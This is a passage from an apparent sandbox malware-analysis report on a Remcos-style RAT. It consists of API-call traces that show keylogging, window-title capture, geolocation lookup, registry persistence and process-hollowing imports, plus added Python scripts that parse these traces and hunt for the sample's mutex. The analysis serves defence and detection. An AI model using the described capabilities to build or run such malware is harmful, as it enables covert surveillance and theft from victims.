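• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
"""

# Api.Module(stack values), ref: call site, with an optional "Part of subcall
# function X:" prefix.  Arguments may themselves contain parentheses (a path with
# "(x86)"), so the match is greedy and the closing ")" is tied to the trailing "ref:".
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
ApiCall = namedtuple("ApiCall", "api module args ref subcall")  # ref/subcall: int addresses

def parse_api_lines(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls

# Editor's interpretation, not a statement from the report: what a RAT gains by
# resolving each name at run time instead of importing it statically.
CAPABILITY = {
    "NtUnmapViewOfSection": "unmap the image of a target process (process hollowing)",
    "IsUserAnAdmin": "check whether the current token is administrative",
    "SetProcessDEPPolicy": "change DEP for its own process",
    "GetProcessImageFileNameW": "enumerate image paths of running processes",
    "GlobalMemoryStatusEx": "host fingerprinting (RAM size)",
    "EnumDisplayDevicesW": "host fingerprinting (display devices)",
}

def resolved_imports(calls):
    """Each LoadLibraryA/GetModuleHandleA entry in the listing shows the module in
    the first stack slot and, in the next one, the name the following GetProcAddress
    receives.  Returns (module, symbol or ordinal, capability) triples."""
    out = []
    for c in calls:
        if c.api not in ("LoadLibraryA", "GetModuleHandleA") or len(c.args) < 2:
            continue
        sym = c.args[1]
        if HEX8_RE.match(sym):   # an integer in the name slot: assumed to be an ordinal
            sym = f"ordinal {int(sym, 16)}"
        out.append((c.args[0], sym, CAPABILITY.get(sym, "unclassified")))
    return out

FILE_ATTR = {0x1: "READONLY", 0x2: "HIDDEN", 0x4: "SYSTEM",
             0x10: "DIRECTORY", 0x20: "ARCHIVE", 0x80: "NORMAL"}

def decode_args(call):
    """Render the numeric arguments of Sleep and SetFileAttributesW; None otherwise."""
    try:
        if call.api == "Sleep" and call.args:
            return f"sleep {int(call.args[0], 16)} ms"
        if call.api == "SetFileAttributesW" and len(call.args) >= 2:
            v = int(call.args[1], 16)
            names = [n for bit, n in FILE_ATTR.items() if v & bit] or [f"0x{v:x}"]
            return "attributes " + "|".join(names)
    except ValueError:           # the plugin printed "?" for a value it could not recover
        pass
    return None

def summarize(text):
    calls = parse_api_lines(text)
    return {
        "calls": len(calls),
        "imports": resolved_imports(calls),
        "decoded": {(c.api, f"{c.ref:08X}"): decode_args(c) for c in calls if decode_args(c)},
    }

if __name__ == "__main__":
    s = summarize(SAMPLE)
    for mod, sym, cap in s["imports"]:
        print(f"{mod:8} {sym:26} {cap}")
    for (api, ref), txt in s["decoded"].items():
        print(f"{ref} {api}: {txt}")
```

Run as a script it prints one row per run-time-resolved name (ntdll/NtUnmapViewOfSection flagged as process hollowing, Shlwapi/ordinal 12 left unclassified) and the decoded Sleep and attribute values; to apply it to the rest of this report, paste any "APIs" block into SAMPLE, since the parser only relies on the `Api.Module(...), ref:` shape and tolerates entries without an argument list such as WSAGetLastError.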

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • connect.WS2_32(?,00D8BAC8,00000010), ref: 004042A5
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                            • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                            • API String ID: 994465650-2151626615
                                                                                            • Opcode ID: 4bca7d416cb3b09075a25b85a3234a820d3ab4dd462292ab93703bc931394468
                                                                                            • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                            • Opcode Fuzzy Hash: 4bca7d416cb3b09075a25b85a3234a820d3ab4dd462292ab93703bc931394468
                                                                                            • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                            • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                            • String ID:
                                                                                            • API String ID: 3658366068-0
                                                                                            • Opcode ID: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                            • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                            • Opcode Fuzzy Hash: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                            • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                            • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                            • GetForegroundWindow.USER32 ref: 0040A467
                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                            • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                            • String ID: [${ User has been idle for $ minutes }$]
                                                                                            • API String ID: 911427763-3954389425
                                                                                            • Opcode ID: 40dc83a074cb538ad83ecf649c27d5a724cb82695593143808d24998f610649e
                                                                                            • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                            • Opcode Fuzzy Hash: 40dc83a074cb538ad83ecf649c27d5a724cb82695593143808d24998f610649e
                                                                                            • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LongNamePath
                                                                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                            • API String ID: 82841172-425784914
                                                                                            • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                            • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                            • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                            • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                            Strings
                                                                                            • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                            • String ID: http://geoplugin.net/json.gp
                                                                                            • API String ID: 3121278467-91888290
                                                                                            • Opcode ID: 08bf1114c47a89f5108f7250f1a6636181e558f0e019b3e6eb8e3cc4f37dd347
                                                                                            • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                            • Opcode Fuzzy Hash: 08bf1114c47a89f5108f7250f1a6636181e558f0e019b3e6eb8e3cc4f37dd347
                                                                                            • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                            APIs
                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                              • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                            • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                            • API String ID: 782494840-2070987746
                                                                                            • Opcode ID: c99cda145aab75313da119a94411f5e202358f5817e57e5ec0b18c18d1186637
                                                                                            • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                            • Opcode Fuzzy Hash: c99cda145aab75313da119a94411f5e202358f5817e57e5ec0b18c18d1186637
                                                                                            • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                              • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2099061454-0
                                                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                            • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                            • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                            • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleSizeSleep
                                                                                            • String ID: `AG
                                                                                            • API String ID: 1958988193-3058481221
                                                                                            • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                            • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                            • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                            • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
• RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
• RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: HgF$pth_unenc
• API String ID: 1818849710-3662775637
APIs
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
  • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Memory Dump Source
• Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
APIs
• GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
Memory Dump Source
• Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
Similarity
• API ID: AddressProcProtectVirtual$HandleModule
• String ID:
• API String ID: 2152742572-0
APIs
• send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
• WaitForSingleObject.KERNEL32(00000000,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
• SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: EventObjectSingleWaitsend
• String ID: LAL
• API String ID: 3963590051-3302426157
APIs
• CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
• CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
• RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
• RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: TUF
• API String ID: 1818849710-3431404234
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
• CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
• CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
• API String ID: 3360349984-0
APIs
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
• WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
• CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• String ID:
• API String ID: 3604237281-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
• CloseHandle.KERNEL32(00000000), ref: 0041B67A
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: CountEventTick
• String ID: >G
• API String ID: 180926312-1296849874
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
• GetLastError.KERNEL32 ref: 0040BEF1
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: CreateErrorLastMutex
• String ID: Rmc-MKYDDH
• API String ID: 1925916568-2989027721
• Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
• Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
• Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
• Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
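The CreateMutexA / GetLastError pair above is the single-instance check: the sample creates a named mutex (the String ID field gives its name, Rmc-MKYDDH) and reads GetLastError, where ERROR_ALREADY_EXISTS (183) tells it another copy is already running. That mutex name is the most directly hunt-able artifact in this block. The following Python script is an added example and not part of the Joe Sandbox report: it scans a handle listing for mutant objects whose leaf name looks like this one and reports the owning process. The generalized pattern (Rmc- followed by six upper-case letters or digits, of which Rmc-MKYDDH is one instance) and the one-handle-per-line input format are assumptions; the listing is constructed sample data, not output captured from this sample.

```python
import re
from dataclasses import dataclass

# Exact mutex name reported for this sample (the report's "String ID" field).
SAMPLE_MUTEX = "Rmc-MKYDDH"

# Assumption: the generic shape is "Rmc-" plus six upper-case letters or
# digits; SAMPLE_MUTEX is one instance of it.
REMCOS_MUTEX_RE = re.compile(r"^Rmc-[A-Z0-9]{6}$")

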